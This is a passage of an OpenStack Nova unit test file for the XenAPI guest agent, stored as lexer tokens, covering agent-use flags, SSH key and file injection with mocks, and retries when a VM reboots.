phase_branches.PhaseFailureCheckpoint.all_previous(
'all_fail_subtest', action=htf.PhaseResult.FAIL_SUBTEST),
skip0), phase2)
self.assertTestFail(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1', 'phase2')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.SKIP, test_rec,
'skip0')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.FAIL, test_rec,
'fail_phase')
self.assertEqual([
test_record.CheckpointRecord(
name='all_fail_subtest',
action=htf.PhaseResult.FAIL_SUBTEST,
conditional=phase_branches.PreviousPhases.ALL,
subtest_name='sub',
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.FAIL_SUBTEST),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
class DiagnosisCheckpointIntegrationTest(htf_test.TestCase):
def test_asdict(self):
checkpoint = phase_branches.DiagnosisCheckpoint(
'checkpoint',
phase_branches.DiagnosisCondition.on_any(BranchDiagResult.SET),
action=htf.PhaseResult.FAIL_SUBTEST)
self.assertEqual(
{
'name': 'checkpoint',
'action': htf.PhaseResult.FAIL_SUBTEST,
'diag_condition': {
'condition': phase_branches.ConditionOn.ANY,
'diagnosis_results': [BranchDiagResult.SET],
},
}, checkpoint._asdict())
@htf_test.yields_phases
def test_pass(self):
test_rec = yield htf.Test(
phase0,
phase_branches.DiagnosisCheckpoint(
'diag_pass',
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.NOT_SET)),
phase1)
self.assertTestPass(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1')
self.assertEqual([
test_record.CheckpointRecord(
name='diag_pass',
action=htf.PhaseResult.STOP,
conditional=phase_branches.DiagnosisCondition(
phase_branches.ConditionOn.ALL, (BranchDiagResult.NOT_SET,)),
subtest_name=None,
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.CONTINUE),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_fail(self):
test_rec = yield htf.Test(
add_set_diag,
phase_branches.DiagnosisCheckpoint(
'diag_fail',
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.SET)),
error_phase)
self.assertTestFail(test_rec)
self.assertPhasesOutcomeByName(
test_record.PhaseOutcome.PASS,
test_rec,
'add_set_diag',
)
self.assertEqual([
test_record.CheckpointRecord(
name='diag_fail',
action=htf.PhaseResult.STOP,
conditional=phase_branches.DiagnosisCondition(
phase_branches.ConditionOn.ALL, (BranchDiagResult.SET,)),
subtest_name=None,
result=phase_executor.PhaseExecutionOutcome(htf.PhaseResult.STOP),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_subtest_pass(self):
test_rec = yield htf.Test(
phase0,
htf.Subtest(
'subtest', phase1,
phase_branches.DiagnosisCheckpoint(
'diag_subtest_pass',
phase_branches.DiagnosisCondition.on_all(
BranchDiagResult.NOT_SET),
action=htf.PhaseResult.FAIL_SUBTEST), phase2), phase3)
self.assertTestPass(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
                                   'phase0', 'phase1', 'phase2', 'phase3')
self.assertEqual([
test_record.CheckpointRecord(
name='diag_subtest_pass',
action=htf.PhaseResult.FAIL_SUBTEST,
conditional=phase_branches.DiagnosisCondition(
phase_branches.ConditionOn.ALL, (BranchDiagResult.NOT_SET,)),
subtest_name='subtest',
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.CONTINUE),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_subtest_fail(self):
test_rec = yield htf.Test(
add_set_diag,
htf.Subtest(
'subtest', phase0,
phase_branches.DiagnosisCheckpoint(
'diag_subtest_pass',
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.SET),
action=htf.PhaseResult.FAIL_SUBTEST), skip0), phase1)
self.assertTestFail(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'add_set_diag', 'phase0', 'phase1')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.SKIP, test_rec,
'skip0')
self.assertEqual([
test_record.CheckpointRecord(
name='diag_subtest_pass',
action=htf.PhaseResult.FAIL_SUBTEST,
conditional=phase_branches.DiagnosisCondition(
phase_branches.ConditionOn.ALL, (BranchDiagResult.SET,)),
subtest_name='subtest',
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.FAIL_SUBTEST),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
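The integration tests above all exercise the same few building blocks. As a distilled sketch, using only names that already appear in this file, a test where run_phase executes only because an earlier phase attached the SET diagnosis would be assembled like this:

# Minimal sketch reusing the phases defined above: the branch body runs
# only when add_set_diag has attached the SET diagnosis first.
branch_demo = htf.Test(
    add_set_diag,
    phase_branches.BranchSequence(
        phase_branches.DiagnosisCondition.on_all(BranchDiagResult.SET),
        run_phase),
)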
| 36.804071
| 80
| 0.655144
| 2,851
| 28,928
| 6.339179
| 0.054016
| 0.046478
| 0.043158
| 0.077685
| 0.889504
| 0.875118
| 0.870359
| 0.833675
| 0.82366
| 0.807171
| 0
| 0.005482
| 0.255877
| 28,928
| 785
| 81
| 36.850955
| 0.834108
| 0.002593
| 0
| 0.753383
| 0
| 0
| 0.053766
| 0.006344
| 0
| 0
| 0
| 0
| 0.156391
| 1
| 0.063158
| false
| 0.075188
| 0.010526
| 0.004511
| 0.093233
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
da685e78f33a6089445ce17ede01d499edf9d284
| 136
|
py
|
Python
|
fets/model/project/src/utils/utilities.py
|
mlperf/box_examples
|
95f8df71fd0c4d155ad29a37efdfbc1e3b1d6294
|
[
"Apache-2.0"
] | 1
|
2020-12-04T08:04:24.000Z
|
2020-12-04T08:04:24.000Z
|
fets/model/project/src/utils/utilities.py
|
mlperf/mlcube_examples
|
209647dade3ad206c00f04323faca9ed4a4937a6
|
[
"Apache-2.0"
] | 4
|
2020-11-20T08:57:45.000Z
|
2020-11-24T21:06:57.000Z
|
fets/model/project/src/utils/utilities.py
|
mlperf/box_examples
|
95f8df71fd0c4d155ad29a37efdfbc1e3b1d6294
|
[
"Apache-2.0"
] | 4
|
2020-10-07T07:57:48.000Z
|
2020-11-06T02:00:51.000Z
|
"""utility functions here"""
def helper():
"""helper function"""
print("helper: Here you can store all your utility functions")
| 27.2
| 66
| 0.676471
| 17
| 136
| 5.411765
| 0.705882
| 0.347826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.176471
| 136
| 4
| 67
| 34
| 0.821429
| 0.279412
| 0
| 0
| 0
| 0
| 0.609195
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
da6b90aaf5a19e07d70051ef2af26db344adcd05
| 1,399
|
py
|
Python
|
processing/preprocessors.py
|
Cawies/data-collection-monitor
|
2a27b53565d13c3d3153e42297d89f995d2c60ee
|
[
"MIT"
] | null | null | null |
processing/preprocessors.py
|
Cawies/data-collection-monitor
|
2a27b53565d13c3d3153e42297d89f995d2c60ee
|
[
"MIT"
] | null | null | null |
processing/preprocessors.py
|
Cawies/data-collection-monitor
|
2a27b53565d13c3d3153e42297d89f995d2c60ee
|
[
"MIT"
] | null | null | null |
# External libraries
import numpy as np
import pandas as pd
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.pipeline import Pipeline
import requests
import json
class PipeLineStepOne(BaseEstimator, TransformerMixin):
''' Brief description of what this transformer class does'''
def __init__(self, variables=None):
if not isinstance(variables, list):
self.variables = [variables]
else:
self.variables = variables
def fit(self, X: pd.DataFrame, y: pd.Series=None):
        ''' This method is only to accommodate the sklearn class format '''
return self
def transform(self, X: pd.DataFrame):
''' This method specifies what transformations will be done to specified data. '''
X = X.copy()
# Define your method here with respect to X.
return X
class PipeLineStepTwo(BaseEstimator, TransformerMixin):
''' Brief description of what this transformer class does'''
def __init__(self, variables=None):
if not isinstance(variables, list):
self.variables = [variables]
else:
self.variables = variables
def fit(self, X: pd.DataFrame, y: pd.Series=None):
        ''' This method is only to accommodate the sklearn class format '''
return self
def transform(self, X: pd.DataFrame):
''' This method specifies what transformations will be done to specified data. '''
X = X.copy()
# Define your method here with respect to X.
return X
# Etc...
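To show how the template steps are meant to be chained (the column names here are made up for illustration), the sklearn Pipeline imported above ties them together:

# Sketch with hypothetical column names; raw_df is assumed to be a DataFrame.
preprocessing = Pipeline([
    ('step_one', PipeLineStepOne(variables=['col_a'])),
    ('step_two', PipeLineStepTwo(variables=['col_b'])),
])
# processed = preprocessing.fit_transform(raw_df)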
| 22.206349
| 84
| 0.724803
| 186
| 1,399
| 5.408602
| 0.33871
| 0.077535
| 0.087475
| 0.063618
| 0.803181
| 0.803181
| 0.803181
| 0.803181
| 0.803181
| 0.803181
| 0
| 0
| 0.182273
| 1,399
| 63
| 85
| 22.206349
| 0.879371
| 0.345961
| 0
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.214286
| false
| 0
| 0.214286
| 0
| 0.642857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
da85a1e4bc297bc8c73b27f32fee9795dfe2bc1f
| 6,486
|
py
|
Python
|
code/traditional_method/medium.py
|
ThreeSRR/License-Plate-Recogonition
|
f2161c8fa0e161b1e03cf2fb1d5a7f4cba4d5449
|
[
"Apache-2.0"
] | null | null | null |
code/traditional_method/medium.py
|
ThreeSRR/License-Plate-Recogonition
|
f2161c8fa0e161b1e03cf2fb1d5a7f4cba4d5449
|
[
"Apache-2.0"
] | null | null | null |
code/traditional_method/medium.py
|
ThreeSRR/License-Plate-Recogonition
|
f2161c8fa0e161b1e03cf2fb1d5a7f4cba4d5449
|
[
"Apache-2.0"
] | null | null | null |
import cv2
import argparse
import numpy as np
import matplotlib.pyplot as plt
from utils import template_matching, split_license, cv2ImgAddText
def task2_1(verbose=True):
src = cv2.imread('../../resources/medium/2-1.jpg')
gray_image = cv2.cvtColor(src, cv2.COLOR_RGB2GRAY)
    # Split the RGB channels and apply thresholding
b, g, r = cv2.split(src)
mask = np.where((b>130)*(r<12), np.ones_like(r), np.zeros_like(r))
gray_mask = gray_image * mask
gray_mask[gray_mask!=0]=255
    # Morphological closing to obtain the complete plate region
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (50, 50))
license_area = cv2.morphologyEx(gray_mask, cv2.MORPH_CLOSE, kernel,iterations = 2)
white_area = np.where(license_area==255)
    # Find the plate-region boundary and crop out the plate
x0, y0, x1, y1 = min(white_area[1]), min(white_area[0]), max(white_area[1]), max(white_area[0])
clip_license = src.copy()
cv2.rectangle(clip_license, (x0, y0), (x1, y1), (0, 0, 255), 10)
license_img = src[y0:y1,x0:x1]
gray_license_img = cv2.cvtColor(license_img, cv2.COLOR_RGB2GRAY)
    # Thresholding to binarize the plate
_, binary_license_img = cv2.threshold(gray_license_img, 0, 255, cv2.THRESH_OTSU)
    # Morphological opening to remove noise
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (10, 10))
binary_license_img = cv2.morphologyEx(binary_license_img, cv2.MORPH_OPEN, kernel,iterations = 1)
    # Dilate so that each plate character forms one connected region
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (18, 18))
dilate_lic_img = cv2.dilate(binary_license_img, kernel)
    # Contour detection to split the plate into individual characters
word_images = split_license(dilate_lic_img, binary_license_img)
    # Template matching
result = template_matching(word_images)
print("".join(result))
if verbose:
for img in [gray_mask, license_area]:
plt.cla()
plt.imshow(img, cmap='gray')
plt.show()
plt.cla()
plt.imshow(license_img[:,:,::-1])
plt.show()
plt.cla()
for i,j in enumerate(word_images):
plt.subplot(1,8,i+1)
plt.imshow(word_images[i],cmap='gray')
plt.show()
res_img = cv2ImgAddText(src, "".join(result), (0,0), textSize=350)
plt.cla()
plt.imshow(res_img)
plt.show()
def task2_2(verbose=True):
src = cv2.imread('../../resources/medium/2-2.jpg')
gray_image = cv2.cvtColor(src, cv2.COLOR_RGB2GRAY)
    # Split the RGB channels and apply thresholding
b, g, r = cv2.split(src)
mask = np.where((b>130)*(r<11), np.ones_like(r), np.zeros_like(r))
gray_mask = gray_image * mask
gray_mask[gray_mask!=0]=255
    # Morphological closing to obtain the complete plate region
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (50, 50))
license_area = cv2.morphologyEx(gray_mask, cv2.MORPH_CLOSE, kernel,iterations = 2)
white_area = np.where(license_area==255)
    # Find the plate-region boundary and crop out the plate
x0, y0, x1, y1 = min(white_area[1]), min(white_area[0]), max(white_area[1]), max(white_area[0])
clip_license = src.copy()
cv2.rectangle(clip_license, (x0, y0), (x1, y1), (0, 0, 255), 10)
license_img = src[y0:y1,x0:x1]
gray_license_img = cv2.cvtColor(license_img, cv2.COLOR_RGB2GRAY)
    # Thresholding to binarize the plate
_, binary_license_img = cv2.threshold(gray_license_img, 0, 255, cv2.THRESH_OTSU)
    # Morphological opening to remove noise
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (8,8))
binary_license_img = cv2.morphologyEx(binary_license_img, cv2.MORPH_OPEN, kernel, iterations = 1)
    # Dilate so that each plate character forms one connected region
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (8, 2))
dilate_lic_img = cv2.dilate(binary_license_img, kernel)
    # Contour detection to split the plate into individual characters
word_images = split_license(dilate_lic_img, binary_license_img)
    # Template matching
result = template_matching(word_images)
print("".join(result))
if verbose:
for img in [gray_license_img, binary_license_img, dilate_lic_img]:
plt.cla()
plt.imshow(img, cmap='gray')
plt.show()
plt.cla()
for i,j in enumerate(word_images):
plt.subplot(1,8,i+1)
plt.imshow(word_images[i],cmap='gray')
plt.show()
res_img = cv2ImgAddText(src, "".join(result), (0,0), textSize=350)
plt.cla()
plt.imshow(res_img)
plt.show()
def task3_3(verbose=True):
src = cv2.imread('../../resources/medium/2-3.jpg')
gray_image = cv2.cvtColor(src, cv2.COLOR_RGB2GRAY)
    # Split the RGB channels and apply thresholding
b, g, r = cv2.split(src)
mask = np.where((b>100)*(r<80), np.ones_like(r), np.zeros_like(r))
gray_mask = gray_image * mask
gray_mask[gray_mask!=0]=255
    # Morphological closing to obtain the complete plate region
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (30, 20))
license_area = cv2.morphologyEx(gray_mask, cv2.MORPH_CLOSE, kernel,iterations = 2)
white_area = np.where(license_area==255)
    # Find the plate-region boundary and crop out the plate
x0, y0, x1, y1 = min(white_area[1]), min(white_area[0]), max(white_area[1]), max(white_area[0])
clip_license = src.copy()
cv2.rectangle(clip_license, (x0, y0), (x1, y1), (0, 0, 255), 10)
license_img = src[y0:y1,x0:x1]
gray_license_img = cv2.cvtColor(license_img, cv2.COLOR_RGB2GRAY)
    # Thresholding to binarize the plate
_, binary_license_img = cv2.threshold(gray_license_img, 0, 255, cv2.THRESH_OTSU)
    # Morphological opening to remove noise
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (5,5))
binary_license_img = cv2.morphologyEx(binary_license_img, cv2.MORPH_OPEN, kernel, iterations = 1)
    # Dilate so that each plate character forms one connected region
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (15, 10))
dilate_lic_img = cv2.dilate(binary_license_img, kernel)
    # Contour detection to split the plate into individual characters
word_images = split_license(dilate_lic_img, binary_license_img)
    # Template matching
result = template_matching(word_images)
print("".join(result))
if verbose:
for img in [gray_license_img, binary_license_img, dilate_lic_img]:
plt.cla()
plt.imshow(img, cmap='gray')
plt.show()
plt.cla()
for i,j in enumerate(word_images):
plt.subplot(1,8,i+1)
plt.imshow(word_images[i],cmap='gray')
plt.show()
res_img = cv2ImgAddText(src, "".join(result), (0,0), textSize=350)
plt.cla()
plt.imshow(res_img)
plt.show()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--task_id', default="1", type=str, help='task id, choose from 1,2,3')
parser.add_argument('--verbose', action='store_true', help='display result during process or not')
args = parser.parse_args()
task_id = args.task_id
verbose = args.verbose
task_func = {"1": task2_1, "2": task2_2, "3": task3_3}
task_func[task_id](verbose=verbose)
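task2_1, task2_2 and task3_3 above are near-duplicates that differ only in the input path, the blue/red channel thresholds, and the three kernel sizes. A hedged refactor sketch of the shared pipeline (the function name and parameters are illustrative, and the verbose plotting is omitted):

# Hypothetical parameterized version of the pipeline repeated above.
def recognize_plate(path, b_thresh, r_thresh, close_k, open_k, dilate_k):
    src = cv2.imread(path)
    gray = cv2.cvtColor(src, cv2.COLOR_RGB2GRAY)
    # Channel thresholding: plate pixels have strong blue and weak red.
    b, g, r = cv2.split(src)
    mask = np.where((b > b_thresh) * (r < r_thresh),
                    np.ones_like(r), np.zeros_like(r))
    gray_mask = gray * mask
    gray_mask[gray_mask != 0] = 255
    # Close to fill the plate region, then crop to its bounding box.
    kernel = cv2.getStructuringElement(cv2.MORPH_RECT, close_k)
    area = cv2.morphologyEx(gray_mask, cv2.MORPH_CLOSE, kernel, iterations=2)
    ys, xs = np.where(area == 255)
    plate = src[ys.min():ys.max(), xs.min():xs.max()]
    gray_plate = cv2.cvtColor(plate, cv2.COLOR_RGB2GRAY)
    # Binarize, denoise, dilate, then split and match characters.
    _, binary = cv2.threshold(gray_plate, 0, 255, cv2.THRESH_OTSU)
    kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, open_k)
    binary = cv2.morphologyEx(binary, cv2.MORPH_OPEN, kernel, iterations=1)
    kernel = cv2.getStructuringElement(cv2.MORPH_RECT, dilate_k)
    dilated = cv2.dilate(binary, kernel)
    words = split_license(dilated, binary)
    return "".join(template_matching(words))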
| 30.167442
| 102
| 0.65387
| 934
| 6,486
| 4.32334
| 0.147752
| 0.079247
| 0.06736
| 0.073551
| 0.877415
| 0.877415
| 0.876424
| 0.876424
| 0.847449
| 0.847449
| 0
| 0.053163
| 0.205365
| 6,486
| 214
| 103
| 30.308411
| 0.730307
| 0.042862
| 0
| 0.75
| 0
| 0
| 0.034935
| 0.014556
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023438
| false
| 0
| 0.039063
| 0
| 0.0625
| 0.023438
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e5097e620f7acc366ae32e57a85a3c6397a72999
| 41,635
|
py
|
Python
|
nova/tests/unit/virt/xenapi/test_agent.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/unit/virt/xenapi/test_agent.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/unit/virt/xenapi/test_agent.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | 2
|
2017-07-20T17:31:34.000Z
|
2020-07-24T02:42:19.000Z
|
begin_unit
comment|'# Copyright 2013 OpenStack Foundation'
nl|'\n'
comment|'# All Rights Reserved.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
name|'import'
name|'base64'
newline|'\n'
name|'import'
name|'time'
newline|'\n'
name|'import'
name|'uuid'
newline|'\n'
nl|'\n'
name|'import'
name|'mock'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
name|'import'
name|'exception'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'test'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'xenapi'
name|'import'
name|'agent'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'xenapi'
name|'import'
name|'fake'
name|'as'
name|'xenapi_fake'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|function|_get_fake_instance
name|'def'
name|'_get_fake_instance'
op|'('
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'system_metadata'
op|'='
op|'['
op|']'
newline|'\n'
name|'for'
name|'k'
op|','
name|'v'
name|'in'
name|'kwargs'
op|'.'
name|'items'
op|'('
op|')'
op|':'
newline|'\n'
indent|' '
name|'system_metadata'
op|'.'
name|'append'
op|'('
op|'{'
nl|'\n'
string|'"key"'
op|':'
name|'k'
op|','
nl|'\n'
string|'"value"'
op|':'
name|'v'
nl|'\n'
op|'}'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'return'
op|'{'
nl|'\n'
string|'"system_metadata"'
op|':'
name|'system_metadata'
op|','
nl|'\n'
string|'"uuid"'
op|':'
string|'"uuid"'
op|','
nl|'\n'
string|'"key_data"'
op|':'
string|'"ssh-rsa asdf"'
op|','
nl|'\n'
string|'"os_type"'
op|':'
string|'"asdf"'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|AgentTestCaseBase
dedent|''
name|'class'
name|'AgentTestCaseBase'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
DECL|member|_create_agent
indent|' '
name|'def'
name|'_create_agent'
op|'('
name|'self'
op|','
name|'instance'
op|','
name|'session'
op|'='
string|'"session"'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'session'
op|'='
name|'session'
newline|'\n'
name|'self'
op|'.'
name|'virtapi'
op|'='
string|'"virtapi"'
newline|'\n'
name|'self'
op|'.'
name|'vm_ref'
op|'='
string|'"vm_ref"'
newline|'\n'
name|'return'
name|'agent'
op|'.'
name|'XenAPIBasedAgent'
op|'('
name|'self'
op|'.'
name|'session'
op|','
name|'self'
op|'.'
name|'virtapi'
op|','
nl|'\n'
name|'instance'
op|','
name|'self'
op|'.'
name|'vm_ref'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
class AgentImageFlagsTestCase(AgentTestCaseBase):
    def test_agent_is_present(self):
        self.flags(use_agent_default=False, group='xenserver')
        instance = {"system_metadata":
                    [{"key": "image_xenapi_use_agent", "value": "true"}]}
        self.assertTrue(agent.should_use_agent(instance))

    def test_agent_is_disabled(self):
        self.flags(use_agent_default=True, group='xenserver')
        instance = {"system_metadata":
                    [{"key": "image_xenapi_use_agent", "value": "false"}]}
        self.assertFalse(agent.should_use_agent(instance))

    def test_agent_uses_default_when_prop_invalid(self):
        self.flags(use_agent_default=True, group='xenserver')
        instance = {"system_metadata":
                    [{"key": "image_xenapi_use_agent", "value": "bob"}],
                    "uuid": "uuid"}
        self.assertTrue(agent.should_use_agent(instance))

    def test_agent_default_not_present(self):
        self.flags(use_agent_default=False, group='xenserver')
        instance = {"system_metadata": []}
        self.assertFalse(agent.should_use_agent(instance))

    def test_agent_default_present(self):
        self.flags(use_agent_default=True, group='xenserver')
        instance = {"system_metadata": []}
        self.assertTrue(agent.should_use_agent(instance))


class SysMetaKeyTestBase(object):
    key = None

    def _create_agent_with_value(self, value):
        kwargs = {self.key: value}
        instance = _get_fake_instance(**kwargs)
        return self._create_agent(instance)

    def test_get_sys_meta_key_true(self):
        agent = self._create_agent_with_value("true")
        self.assertTrue(agent._get_sys_meta_key(self.key))

    def test_get_sys_meta_key_false(self):
        agent = self._create_agent_with_value("False")
        self.assertFalse(agent._get_sys_meta_key(self.key))

    def test_get_sys_meta_key_invalid_is_false(self):
        agent = self._create_agent_with_value("invalid")
        self.assertFalse(agent._get_sys_meta_key(self.key))

    def test_get_sys_meta_key_missing_is_false(self):
        instance = _get_fake_instance()
        agent = self._create_agent(instance)
        self.assertFalse(agent._get_sys_meta_key(self.key))


class SkipSshFlagTestCase(SysMetaKeyTestBase, AgentTestCaseBase):
    key = "image_xenapi_skip_agent_inject_ssh"

    def test_skip_ssh_key_inject(self):
        agent = self._create_agent_with_value("True")
        self.assertTrue(agent._skip_ssh_key_inject())


class SkipFileInjectAtBootFlagTestCase(SysMetaKeyTestBase, AgentTestCaseBase):
    key = "image_xenapi_skip_agent_inject_files_at_boot"

    def test_skip_inject_files_at_boot(self):
        agent = self._create_agent_with_value("True")
        self.assertTrue(agent._skip_inject_files_at_boot())


class InjectSshTestCase(AgentTestCaseBase):
    @mock.patch.object(agent.XenAPIBasedAgent, 'inject_file')
    def test_inject_ssh_key_succeeds(self, mock_inject_file):
        instance = _get_fake_instance()
        agent = self._create_agent(instance)

        agent.inject_ssh_key()
        mock_inject_file.assert_called_once_with("/root/.ssh/authorized_keys",
                                                 "\n# The following ssh key "
                                                 "was injected by Nova"
                                                 "\nssh-rsa asdf\n")

    @mock.patch.object(agent.XenAPIBasedAgent, 'inject_file')
    def _test_inject_ssh_key_skipped(self, instance, mock_inject_file):
        agent = self._create_agent(instance)

        # make sure it is not called
        agent.inject_ssh_key()
        mock_inject_file.assert_not_called()

    def test_inject_ssh_key_skipped_no_key_data(self):
        instance = _get_fake_instance()
        instance["key_data"] = None
        self._test_inject_ssh_key_skipped(instance)

    def test_inject_ssh_key_skipped_windows(self):
        instance = _get_fake_instance()
        instance["os_type"] = "windows"
        self._test_inject_ssh_key_skipped(instance)

    def test_inject_ssh_key_skipped_cloud_init_present(self):
        instance = _get_fake_instance(
            image_xenapi_skip_agent_inject_ssh="True")
        self._test_inject_ssh_key_skipped(instance)


class FileInjectionTestCase(AgentTestCaseBase):
    @mock.patch.object(agent.XenAPIBasedAgent, '_call_agent')
    def test_inject_file(self, mock_call_agent):
        instance = _get_fake_instance()
        agent = self._create_agent(instance)

        b64_path = base64.b64encode('path')
        b64_contents = base64.b64encode('contents')

        agent.inject_file("path", "contents")
        mock_call_agent.assert_called_once_with('inject_file',
                                                {'b64_contents': b64_contents,
                                                 'b64_path': b64_path})

    @mock.patch.object(agent.XenAPIBasedAgent, 'inject_file')
    def test_inject_files(self, mock_inject_file):
        instance = _get_fake_instance()
        agent = self._create_agent(instance)

        files = [("path1", "content1"), ("path2", "content2")]

        agent.inject_files(files)
        mock_inject_file.assert_has_calls(
            [mock.call("path1", "content1"), mock.call("path2", "content2")])

    @mock.patch.object(agent.XenAPIBasedAgent, 'inject_file')
    def test_inject_files_skipped_when_cloud_init_installed(self,
                                                            mock_inject_file):
        instance = _get_fake_instance(
            image_xenapi_skip_agent_inject_files_at_boot="True")
        agent = self._create_agent(instance)

        files = [("path1", "content1"), ("path2", "content2")]

        agent.inject_files(files)
        mock_inject_file.assert_not_called()


class FakeRebootException(Exception):
    details = ["", "", "", "asdf REBOOT: asdf"]


class RebootRetryTestCase(AgentTestCaseBase):
    @mock.patch.object(agent, '_wait_for_new_dom_id')
    def test_retry_on_reboot(self, mock_wait):
        mock_session = mock.Mock()

        def fake_call_plugin(*args, **kwargs):
            if fake_call_plugin.called:
                return {"returncode": '0', "message": "done"}
            else:
                fake_call_plugin.called = True
                raise FakeRebootException()

        fake_call_plugin.called = False
        mock_session.XenAPI.Failure = FakeRebootException
        mock_session.VM.get_domid.return_value = "fake_dom_id"
        mock_session.call_plugin.side_effect = fake_call_plugin

        agent = self._create_agent(None, mock_session)

        result = agent._call_agent("asdf")
        self.assertEqual("done", result)
        self.assertTrue(mock_session.VM.get_domid.called)
        self.assertEqual(2, mock_session.call_plugin.call_count)
        mock_wait.assert_called_once_with(mock_session, self.vm_ref,
                                          "fake_dom_id", "asdf")

    @mock.patch.object(time, 'sleep')
    @mock.patch.object(time, 'time')
    def test_wait_for_new_dom_id_found(self, mock_time, mock_sleep):
        mock_session = mock.Mock()
        mock_session.VM.get_domid.return_value = "new"

        agent._wait_for_new_dom_id(mock_session, "vm_ref", "old", "method")

        mock_session.VM.get_domid.assert_called_once_with("vm_ref")
        self.assertFalse(mock_sleep.called)

    @mock.patch.object(time, 'sleep')
    @mock.patch.object(time, 'time')
    def test_wait_for_new_dom_id_after_retry(self, mock_time, mock_sleep):
        self.flags(agent_timeout=3, group="xenserver")
